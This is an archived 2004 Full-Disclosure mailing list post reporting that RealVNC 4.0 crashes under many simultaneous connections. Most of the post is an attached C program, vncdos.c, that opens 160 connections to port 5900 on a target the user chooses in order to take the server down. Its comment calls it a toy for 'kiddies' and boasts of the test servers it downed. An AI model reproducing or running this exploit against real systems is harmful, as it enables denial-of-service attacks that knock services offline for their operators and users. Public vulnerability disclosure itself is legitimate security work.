'[Full-Disclosure] RealVNC 4.0 remote ddos vulnerability with stupid Exploit'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-Disclosure] RealVNC 4.0 remote ddos vulnerability with stupid Exploit
From:       "Orhan BAYRAK" <lord () linuxmail ! org>
Date:       2004-08-30 18:58:20
Message-ID: 20040830185820.4AD8823C11 () ws5-3 ! us4 ! outblaze ! com
[Download RAW message or body]

if you try to about 80 or 90 conection request to the VNC server same time..  it gets \
crash.. i attached a stupid ddos exploit for this hole.. 





-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze


["vncdos.c" (application/octet-stream)]

/****************************************************************************
 *                                                                          *
 *               RealVNC 4.0 remote ddos Exploit                            *
 *                                                                          *
 *  This is a stupid bug and stupid exploit. and this toy for kiddies       *
 * Tested agains Windows XP,2000 and 98. it works well and the test servers *
 * are down with an ADSL Router heheh :p    have fun..                      *
 * Anyway what can i say more...                                            *
 * Gr33t1ngz: N4rK07IX, blueStar, L4M3R.                                    *
 *                                                                          *
 *                            Code by Uz4yh4N <Lord@Linuxmail.org>          *
 *                                                                          * 
 ****************************************************************************/



#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>

#define PORT 5900
#define TIMES 160  

main(int argc, char *argv[])
{
    int sockfd[TIMES+5],i;
    struct hostent *he;
    struct sockaddr_in servaddr;
 
       

    if(argc != 2) {
      fprintf(stdout, "\n Usage: %s hostname/ip \n\n",argv[0]);
      exit(-1);
    }
    if ((he=gethostbyname(argv[1])) == NULL) { 
            perror("gethostbyname");
            exit(-1);
        }

    for(i=0;i<TIMES;++i) {

      if((sockfd[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
         perror("socket");
            exit(-1);
      }
    }
  
 servaddr.sin_family = AF_INET;
 servaddr.sin_port = htons(PORT);
 servaddr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(servaddr.sin_zero), '\0', 8);

 fprintf(stderr, "[+] Trying...\n");

  for(i=0;i<TIMES;++i) {
	
    if(connect(sockfd[i], (struct sockaddr *)&servaddr, sizeof(struct sockaddr)) == -1) {
	  fprintf(stderr, "[+] The target must be down..\n");
	  goto done;
	}
     
 }

 done:
  for(i=i;i>0;i--) 
    close(sockfd[i]);

  fprintf(stdout, "[+] Done..\n");
 
  return 0;
 
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic